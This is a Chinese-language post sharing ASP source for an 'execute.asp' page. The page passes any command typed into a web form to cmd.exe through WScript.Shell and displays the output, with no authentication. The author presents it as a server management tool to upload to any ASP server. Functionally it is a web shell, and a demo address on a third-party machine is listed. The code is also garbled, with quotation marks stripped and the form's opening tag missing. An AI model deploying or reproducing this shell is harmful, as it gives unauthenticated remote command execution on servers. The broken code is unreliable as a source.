可以執行系統指令的ASP源碼放送

作者：Eve Cole 更新時間：2025-02-16 12:00:04

最近正在寫一個遠端伺服器管理的東東（借鑒了ASE的部分程式碼、增加了遠端

執行命令、上傳、服務等功能。），得到了阿新、ADAM、辰兒、Ghost_happy、

crazybird等很多網友的幫助，讓我很感動，所以我打算寫好了以後，全部原代碼

公佈，可以自由修改和散佈。你所要做的只是上傳程式到一個支援ASP的伺服器。

值得注意的是，程式運行必須有FileSystemObject支援。以下是遠端執行命令的

原代碼。 copy下來另存為execute.asp.

示範網址：http://210.160.4.24/scripts/execute.asp

一台日本的爛機，所以中文會出現亂碼！

<html>

<head>

<style>

<!--

table,body{ font-family: 宋體; font-size: 9pt }

a{ font-family: 宋體; font-size: 9pt; color: rgb(0,32,64);

text-decoration: none }

a:hover{ font-family: 宋體; color: rgb(255,0,0); text-decoration: none

}

a:visited{ color: rgb(128,0,0) }

-->

</style>

</head>

<p align=left>輸入要執行的指令：<input type=text name=ml

size=20 value=dir c:/ style=background-color: #C0C0C0; color:

#000000; border-style: solid; border-width: 1>

<input type=submit value=執行name=B1 style=background-color:

#C0C0C0; color: #000000; border: 1 groove #C0C0C0></p>

</form>

ml=request.form(ml)

cmd=c:/winnt/system32/cmd.exe /c &ml& >c:/whoamI.txt '修改

whoamI.txt路徑到一個有寫入權限的目錄

Set WShShell = Server.CreateObject(WScript.Shell)

RetCode = WShShell.Run(cmd, 1, True)

if RetCode = 0 Then

Response.write ml &

Response.write 指令成功執行！ &<br><br>

else

Response.write 指令執行失敗！權限不夠或該程式無法在DOS狀態下執行

！ &<br><br>

end if

'response.write cmd

function htmlencode(str)

dim result

dim l

if isNULL(str) then

htmlencode=

exit function

end if

l=len(str)

result=

dim i

for i = 1 to l

select case mid(str,i,1)

case <

result=result+<

case >

result=result+>

case chr(34)

result=result+

case &

result=result+&

case else

result=result+mid(str,i,1)

end select

htmlencode=result

end function

Set fs =CreateObject(Scripting.FileSystemObject)

Set thisfile = fs.OpenTextFile(c:/whoamI.txt, 1, False) '讀文件，別忘

了修改路徑.

counter=0

do while not thisfile.atendofstream

counter=counter+1

thisline=htmlencode(thisfile.readline)

response.write thisline&<br>

loop

thisfile.Close

set fs=nothing

</body>

</html>